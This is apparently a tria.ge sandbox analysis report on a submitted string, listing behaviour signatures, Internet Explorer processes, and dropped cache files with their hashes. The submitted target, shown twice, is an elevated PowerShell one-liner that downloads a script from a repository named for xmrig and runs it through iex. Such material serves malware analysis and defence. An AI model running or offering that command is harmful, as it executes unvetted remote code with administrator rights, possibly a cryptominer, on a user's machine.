Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    246s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    26/06/2024, 23:29

General

  • Target

    http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Malware Config

Signatures

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 52 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
    1⤵
    • Access Token Manipulation: Create Process with Token
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4676
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4676 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:864

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

    Filesize

    4KB

    MD5

    1bfe591a4fe3d91b03cdf26eaacd8f89

    SHA1

    719c37c320f518ac168c86723724891950911cea

    SHA256

    9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

    SHA512

    02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    471B

    MD5

    5f0847e5a15af2d7923393c3cd30c5d1

    SHA1

    326c44f2bc29ec6578a400d6d46361efcb013540

    SHA256

    28766e681bf500e9cddbcd3275cd898c4165354ad087c2461d9ee374a7e2221e

    SHA512

    a83751183cd1f2ac063a0077f8edfaecda72a4649437070c83f88151c822ff42d43fb8a291c123af2598e10d15cbdc147cef353b2149baca9462fb02e3d67a06

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

    Filesize

    338B

    MD5

    a38bd47572dd302e0424818361c87a03

    SHA1

    c1922b139e11e4e7cb65da2383a8f0e1a8874317

    SHA256

    4658a590eb6ffbd6f1b380105c2aa4c5a466520b08565bbf0d40d2cdf32d1272

    SHA512

    7d63f310812efc116ed11b9f034c9a4fbad7e9fbf47be6446f4a732e665dcd4140c71ee49c49af4568d2d0050ea371c76d67c24994c62ca081103e347ee3bb82

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    404B

    MD5

    40b4a0a58f2c4053999f84d746e9269d

    SHA1

    4759d40d04269a42a0b4728bd3efda44c8dcfe51

    SHA256

    abec5029e904b4839927c0fc06013a6d22f41233740a981883616e12208fe897

    SHA512

    7eb8b37d1eee1bb1825d92862cd244b1064c2ee10484e6dfa62002483e939c0be76f27c31b2a338801ae2cd3b3401f4f9f24ecf427408fc38f105cdbee0aff26

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verDE98.tmp

    Filesize

    15KB

    MD5

    1a545d0052b581fbb2ab4c52133846bc

    SHA1

    62f3266a9b9925cd6d98658b92adec673cbe3dd3

    SHA256

    557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

    SHA512

    bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TQAR3J3W\suggestions[1].en-US

    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Z8S224E8.cookie

    Filesize

    545B

    MD5

    228d114ac6e061ec428fe183d0d2c756

    SHA1

    9891d9f0f8a932e431a0d3fc7e8aa99160600df5

    SHA256

    7a62c8760c3790e6b12ae98282fb7459978c5224f6cf2c0bade271183e394bc0

    SHA512

    956aa0b02dbbecde2babad124452f31154f20516f580855f1c8fe9ba0f635e3affb6bdbbd418bc7c14bdb2b962db9ff45b5d5c05950ee31a33fe4148be99c683